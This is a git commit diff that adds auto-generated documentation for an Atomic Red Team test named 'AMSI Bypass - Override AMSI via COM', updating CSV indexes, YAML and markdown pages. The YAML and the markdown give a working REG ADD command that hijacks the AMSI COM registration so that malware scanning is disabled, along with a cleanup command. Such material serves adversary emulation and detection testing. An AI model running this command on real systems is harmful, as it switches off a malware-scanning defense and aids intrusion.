Generated docs from job=generate-docs branch=master [ci skip]

2023-06-30 14:01:44 +00:00
parent dfd1f98327
commit 02cb591f75
9 changed files with 83 additions and 2 deletions
@@ -390,6 +390,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Reboot Lin
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,AMSI Bypass - Override AMSI via COM,17538258-5699-4ff1-92d1-5ac9b0dc21f5,command_prompt
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
@@ -271,6 +271,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Disable Wi
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,Delete Windows Defender Scheduled Tasks,4b841aa1-0d05-4b32-bbe7-7564346e7c76,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,AMSI Bypass - Override AMSI via COM,17538258-5699-4ff1-92d1-5ac9b0dc21f5,command_prompt
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
@@ -537,6 +537,7 @@
  - Atomic Test #41: Clear Pagging Cache [linux]
  - Atomic Test #42: Disable Memory Swap [linux]
  - Atomic Test #43: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
+  - Atomic Test #44: AMSI Bypass - Override AMSI via COM [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -389,6 +389,7 @@
  - Atomic Test #36: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
  - Atomic Test #37: Delete Windows Defender Scheduled Tasks [windows]
  - Atomic Test #43: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
+  - Atomic Test #44: AMSI Bypass - Override AMSI via COM [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -20604,6 +20604,26 @@ defense-evasion:
          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
        name: powershell
        elevation_required: true
+    - name: AMSI Bypass - Override AMSI via COM
+      auto_generated_guid: 17538258-5699-4ff1-92d1-5ac9b0dc21f5
+      description: "With administrative rights, an adversary can disable AMSI via
+        registry value in HKCU\\Software\\Classes\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}
+        by overriding the Microsoft Defender COM object for AMSI and points it to
+        a DLL that does not exist.\nThis is currently being used by AsyncRAT and others.
+        \nhttps://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html\nhttps://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
+          /ve /t REG_SZ /d C:\IDontExist.dll /f
+
+          '
+        cleanup_command: 'REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
+          /f
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1601:
    technique:
      x_mitre_platforms:
@@ -17484,6 +17484,26 @@ defense-evasion:
          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
        name: powershell
        elevation_required: true
+    - name: AMSI Bypass - Override AMSI via COM
+      auto_generated_guid: 17538258-5699-4ff1-92d1-5ac9b0dc21f5
+      description: "With administrative rights, an adversary can disable AMSI via
+        registry value in HKCU\\Software\\Classes\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}
+        by overriding the Microsoft Defender COM object for AMSI and points it to
+        a DLL that does not exist.\nThis is currently being used by AsyncRAT and others.
+        \nhttps://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html\nhttps://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
+          /ve /t REG_SZ /d C:\IDontExist.dll /f
+
+          '
+        cleanup_command: 'REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
+          /f
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1601:
    technique:
      x_mitre_platforms:
@@ -100,6 +100,8 @@ Additionally, adversaries may exploit legitimate drivers from anti-virus softwar

 - [Atomic Test #43 - Disable Hypervisor-Enforced Code Integrity (HVCI)](#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci)

+- [Atomic Test #44 - AMSI Bypass - Override AMSI via COM](#atomic-test-44---amsi-bypass---override-amsi-via-com)
+

 <br/>

@@ -1804,4 +1806,39 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorE



+<br/>
+<br/>
+
+## Atomic Test #44 - AMSI Bypass - Override AMSI via COM
+With administrative rights, an adversary can disable AMSI via registry value in HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that does not exist.
+This is currently being used by AsyncRAT and others. 
+https://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html
+https://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 17538258-5699-4ff1-92d1-5ac9b0dc21f5
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
+```
+
+#### Cleanup Commands:
+```cmd
+REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /f
+```
+
+
+
+
+
 <br/>